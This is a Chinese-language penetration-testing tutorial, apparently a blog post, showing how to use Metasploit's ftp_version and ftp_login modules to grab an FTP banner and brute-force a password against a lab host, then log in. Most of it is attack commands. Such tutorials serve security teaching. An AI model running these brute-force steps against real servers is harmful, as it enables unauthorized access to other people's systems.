网络安全工程师与白帽黑客教你：Kali Linux渗透与FTP服务器攻防实战

课前声明：
1、本分享仅做学习交流，请自觉遵守法律法规！
2、搜索：Kali与编程，学习更多网络攻防干货！
3、Kali与编程每天准时更新，敬请学习和关注！

3.1 运行ftp_version 漏洞利用框架，如下图所示。
命令：run
获取到FTP Banner 如下图所示：Microsoft FTP Service\x0d\x0a

3.2 返回 ftp_version漏洞框架的上一层，如下图所示。
命令：back

3.3 检索Metasploit（msf）框架对于ftp_login的漏洞模块，如下图所示。
命令：search ftp_login

3.4 利用见多到的ftp_login漏洞模块，如下图所示。
命令：use auxiliary/scanner/ftp/ftp_login

3.5 查看ftp_login漏洞利用模块的参数，如下图所示。
命令：show options
RHOSTS:受害者主机IP
THREADS：线程数
USERNAME:FTP用户名
PASS_FILE:密码文件

3.6 设置RHOSTS参数，如下图所示。
命令：set rhosts 192.168.78.165

3.7 设置USERNAME参数，如下图所示。
命令：set username test1

3.8 设置PASS_FILE参数，如下图所示。
命令：set pass_file /root/pass.txt

3.8 设置THREADS参数，如下图所示。
命令：set threads 5
在这里插入图片描述

3.9 查看参数配置结果（参数是否配置成功），如下图所示。
命令：show options

3.10 执行ftp_login漏洞利用模块，如下图所示。
命令:run
如下图所示，ftp服务暴力破解成功。

3.11 命令行远程登录ftp服务，如下图所示。
命令：ftp IP(ftp 192.168.78.165)

3.12 浏览器URL栏登录FTP服务，如下图所示。
步骤：URl栏输入ftp://IP 在弹出窗口利用破解到的账户信息登录。

3.13 浏览器登录FTP服务成功，如下图所示。

———————————————————完———————————————————

辛苦原创，你的每一次评论点赞和关注，都是我们源源不断的创作动力哦！你也可搜索:Kali与编程，学习更多Kali Linux渗透与白帽编程技巧呢！
点我学习完整视频渗透课，预计更新1000节